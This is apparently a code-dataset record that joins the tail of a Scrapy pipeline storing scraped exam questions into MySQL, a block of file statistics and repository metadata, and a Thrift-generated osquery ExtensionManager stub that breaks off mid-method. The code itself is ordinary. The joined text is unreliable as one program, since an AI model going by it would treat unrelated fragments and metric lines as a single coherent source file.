self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xxxtxm_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Programmer: store the morning question bank into the database
class cxyMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into cxy_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Information Processing Technician: store the morning question bank into the database
class xxclMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xxcl_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Network Administrator
class wlglMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into wlgl_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
| 36.007036
| 364
| 0.586224
| 4,507
| 40,940
| 5.226093
| 0.051697
| 0.01919
| 0.026238
| 0.031587
| 0.903244
| 0.8973
| 0.895304
| 0.887662
| 0.887662
| 0.887662
| 0
| 0.00192
| 0.287738
| 40,940
| 1,137
| 365
| 36.007036
| 0.80583
| 0.043381
| 0
| 0.87108
| 0
| 0.027875
| 0.177136
| 0.01703
| 0.004646
| 0
| 0
| 0
| 0
| 1
| 0.154472
| false
| 0.094077
| 0.005807
| 0.023229
| 0.293844
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 8
| 339a0166df9fe7ba6f5f38a47627b30a26ff6f98
| 39,817
| py
| Python
| osquery/extensions/ExtensionManager.py
| eoinmiller-r7/osquery-python
| 8621cb712cf09c7e46654fc5dca87597e2c0d259
| ["BSD-3-Clause"] | 274
| 2015-04-30T00:59:02.000Z
| 2022-03-19T17:51:37.000Z
| osquery/extensions/ExtensionManager.py
| eoinmiller-r7/osquery-python
| 8621cb712cf09c7e46654fc5dca87597e2c0d259
| ["BSD-3-Clause"] | 51
| 2015-05-01T02:40:45.000Z
| 2021-09-01T19:59:54.000Z
| osquery/extensions/ExtensionManager.py
| eoinmiller-r7/osquery-python
| 8621cb712cf09c7e46654fc5dca87597e2c0d259
| ["BSD-3-Clause"] | 55
| 2015-05-18T18:27:32.000Z
| 2022-01-05T04:10:07.000Z |
#
# Autogenerated by Thrift Compiler (0.10.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
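# (Stubs like these are produced by the Thrift compiler, typically invoked as
#  `thrift --gen py <service>.thrift`; the exact .thrift input file is not
#  shown here.)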
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
import sys
import osquery.extensions.Extension
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
class Iface(osquery.extensions.Extension.Iface):
def extensions(self):
pass
def options(self):
pass
def registerExtension(self, info, registry):
"""
Parameters:
- info
- registry
"""
pass
def deregisterExtension(self, uuid):
"""
Parameters:
- uuid
"""
pass
def query(self, sql):
"""
Parameters:
- sql
"""
pass
def getQueryColumns(self, sql):
"""
Parameters:
- sql
"""
pass
class Client(osquery.extensions.Extension.Client, Iface):
def __init__(self, iprot, oprot=None):
osquery.extensions.Extension.Client.__init__(self, iprot, oprot)
def extensions(self):
self.send_extensions()
return self.recv_extensions()
def send_extensions(self):
self._oprot.writeMessageBegin('extensions', TMessageType.CALL, self._seqid)
args = extensions_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_extensions(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = extensions_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "extensions failed: unknown result")
def options(self):
self.send_options()
return self.recv_options()
def send_options(self):
self._oprot.writeMessageBegin('options', TMessageType.CALL, self._seqid)
args = options_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_options(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = options_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "options failed: unknown result")
def registerExtension(self, info, registry):
"""
Parameters:
- info
- registry
"""
self.send_registerExtension(info, registry)
return self.recv_registerExtension()
def send_registerExtension(self, info, registry):
self._oprot.writeMessageBegin('registerExtension', TMessageType.CALL, self._seqid)
args = registerExtension_args()
args.info = info
args.registry = registry
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_registerExtension(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = registerExtension_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "registerExtension failed: unknown result")
def deregisterExtension(self, uuid):
"""
Parameters:
- uuid
"""
self.send_deregisterExtension(uuid)
return self.recv_deregisterExtension()
def send_deregisterExtension(self, uuid):
self._oprot.writeMessageBegin('deregisterExtension', TMessageType.CALL, self._seqid)
args = deregisterExtension_args()
args.uuid = uuid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deregisterExtension(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = deregisterExtension_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "deregisterExtension failed: unknown result")
def query(self, sql):
"""
Parameters:
- sql
"""
self.send_query(sql)
return self.recv_query()
def send_query(self, sql):
self._oprot.writeMessageBegin('query', TMessageType.CALL, self._seqid)
args = query_args()
args.sql = sql
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_query(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = query_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "query failed: unknown result")
def getQueryColumns(self, sql):
"""
Parameters:
- sql
"""
self.send_getQueryColumns(sql)
return self.recv_getQueryColumns()
def send_getQueryColumns(self, sql):
self._oprot.writeMessageBegin('getQueryColumns', TMessageType.CALL, self._seqid)
args = getQueryColumns_args()
args.sql = sql
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getQueryColumns(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = getQueryColumns_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "getQueryColumns failed: unknown result")
class Processor(osquery.extensions.Extension.Processor, Iface, TProcessor):
def __init__(self, handler):
osquery.extensions.Extension.Processor.__init__(self, handler)
self._processMap["extensions"] = Processor.process_extensions
self._processMap["options"] = Processor.process_options
self._processMap["registerExtension"] = Processor.process_registerExtension
self._processMap["deregisterExtension"] = Processor.process_deregisterExtension
self._processMap["query"] = Processor.process_query
self._processMap["getQueryColumns"] = Processor.process_getQueryColumns
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_extensions(self, seqid, iprot, oprot):
args = extensions_args()
args.read(iprot)
iprot.readMessageEnd()
result = extensions_result()
try:
result.success = self._handler.extensions()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("extensions", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_options(self, seqid, iprot, oprot):
args = options_args()
args.read(iprot)
iprot.readMessageEnd()
result = options_result()
try:
result.success = self._handler.options()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("options", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_registerExtension(self, seqid, iprot, oprot):
args = registerExtension_args()
args.read(iprot)
iprot.readMessageEnd()
result = registerExtension_result()
try:
result.success = self._handler.registerExtension(args.info, args.registry)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("registerExtension", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_deregisterExtension(self, seqid, iprot, oprot):
args = deregisterExtension_args()
args.read(iprot)
iprot.readMessageEnd()
result = deregisterExtension_result()
try:
result.success = self._handler.deregisterExtension(args.uuid)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("deregisterExtension", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_query(self, seqid, iprot, oprot):
args = query_args()
args.read(iprot)
iprot.readMessageEnd()
result = query_result()
try:
result.success = self._handler.query(args.sql)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("query", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getQueryColumns(self, seqid, iprot, oprot):
args = getQueryColumns_args()
args.read(iprot)
iprot.readMessageEnd()
result = getQueryColumns_result()
try:
result.success = self._handler.getQueryColumns(args.sql)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("getQueryColumns", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class extensions_args(object):
thrift_spec = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('extensions_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class extensions_result(object):
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.MAP, 'success', (TType.I64, None, TType.STRUCT, (InternalExtensionInfo, InternalExtensionInfo.thrift_spec), False), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype26, _vtype27, _size25) = iprot.readMapBegin()
for _i29 in range(_size25):
_key30 = iprot.readI64()
_val31 = InternalExtensionInfo()
_val31.read(iprot)
self.success[_key30] = _val31
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('extensions_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.I64, TType.STRUCT, len(self.success))
for kiter32, viter33 in self.success.items():
oprot.writeI64(kiter32)
viter33.write(oprot)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class options_args(object):
thrift_spec = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('options_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class options_result(object):
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.MAP, 'success', (TType.STRING, 'UTF8', TType.STRUCT, (InternalOptionInfo, InternalOptionInfo.thrift_spec), False), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype35, _vtype36, _size34) = iprot.readMapBegin()
for _i38 in range(_size34):
_key39 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val40 = InternalOptionInfo()
_val40.read(iprot)
self.success[_key39] = _val40
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('options_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.STRING, TType.STRUCT, len(self.success))
for kiter41, viter42 in self.success.items():
oprot.writeString(kiter41.encode('utf-8') if sys.version_info[0] == 2 else kiter41)
viter42.write(oprot)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class registerExtension_args(object):
"""
Attributes:
- info
- registry
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'info', (InternalExtensionInfo, InternalExtensionInfo.thrift_spec), None, ), # 1
(2, TType.MAP, 'registry', (TType.STRING, 'UTF8', TType.MAP, (TType.STRING, 'UTF8', TType.LIST, (TType.MAP, (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), False), False), False), None, ), # 2
)
def __init__(self, info=None, registry=None,):
self.info = info
self.registry = registry
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.info = InternalExtensionInfo()
self.info.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.MAP:
self.registry = {}
(_ktype44, _vtype45, _size43) = iprot.readMapBegin()
for _i47 in range(_size43):
_key48 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val49 = {}
(_ktype51, _vtype52, _size50) = iprot.readMapBegin()
for _i54 in range(_size50):
_key55 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val56 = []
(_etype60, _size57) = iprot.readListBegin()
for _i61 in range(_size57):
_elem62 = {}
(_ktype64, _vtype65, _size63) = iprot.readMapBegin()
for _i67 in range(_size63):
_key68 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val69 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_elem62[_key68] = _val69
iprot.readMapEnd()
_val56.append(_elem62)
iprot.readListEnd()
_val49[_key55] = _val56
iprot.readMapEnd()
self.registry[_key48] = _val49
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('registerExtension_args')
if self.info is not None:
oprot.writeFieldBegin('info', TType.STRUCT, 1)
self.info.write(oprot)
oprot.writeFieldEnd()
if self.registry is not None:
oprot.writeFieldBegin('registry', TType.MAP, 2)
oprot.writeMapBegin(TType.STRING, TType.MAP, len(self.registry))
for kiter70, viter71 in self.registry.items():
oprot.writeString(kiter70.encode('utf-8') if sys.version_info[0] == 2 else kiter70)
oprot.writeMapBegin(TType.STRING, TType.LIST, len(viter71))
for kiter72, viter73 in viter71.items():
oprot.writeString(kiter72.encode('utf-8') if sys.version_info[0] == 2 else kiter72)
oprot.writeListBegin(TType.MAP, len(viter73))
for iter74 in viter73:
oprot.writeMapBegin(TType.STRING, TType.STRING, len(iter74))
for kiter75, viter76 in iter74.items():
oprot.writeString(kiter75.encode('utf-8') if sys.version_info[0] == 2 else kiter75)
oprot.writeString(viter76.encode('utf-8') if sys.version_info[0] == 2 else viter76)
oprot.writeMapEnd()
oprot.writeListEnd()
oprot.writeMapEnd()
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class registerExtension_result(object):
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (ExtensionStatus, ExtensionStatus.thrift_spec), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = ExtensionStatus()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('registerExtension_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)


class deregisterExtension_args(object):
    """
    Attributes:
     - uuid
    """

    thrift_spec = (
        None,  # 0
        (1, TType.I64, 'uuid', None, None, ),  # 1
    )

    def __init__(self, uuid=None,):
        self.uuid = uuid

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.I64:
                    self.uuid = iprot.readI64()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('deregisterExtension_args')
        if self.uuid is not None:
            oprot.writeFieldBegin('uuid', TType.I64, 1)
            oprot.writeI64(self.uuid)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)


class deregisterExtension_result(object):
    """
    Attributes:
     - success
    """

    thrift_spec = (
        (0, TType.STRUCT, 'success', (ExtensionStatus, ExtensionStatus.thrift_spec), None, ),  # 0
    )

    def __init__(self, success=None,):
        self.success = success

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.STRUCT:
                    self.success = ExtensionStatus()
                    self.success.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('deregisterExtension_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.STRUCT, 0)
            self.success.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()

    def validate(self):
        return

    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not (self == other)


class query_args(object):
    """
    Attributes:
     - sql
    """

    thrift_spec = (
        None,  # 0
        (1, TType.STRING, 'sql', 'UTF8', None, ),  # 1
    )

    def __init__(self, sql=None,):
        self.sql = sql

    def read(self, iprot):
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    self.sql = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('query_args')
        if self.sql is not None:
            oprot.writeFieldBegin('sql', TType.STRING, 1)
            oprot.writeString(self.sql.encode('utf-8') if sys.version_info[0] == 2 else self.sql)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
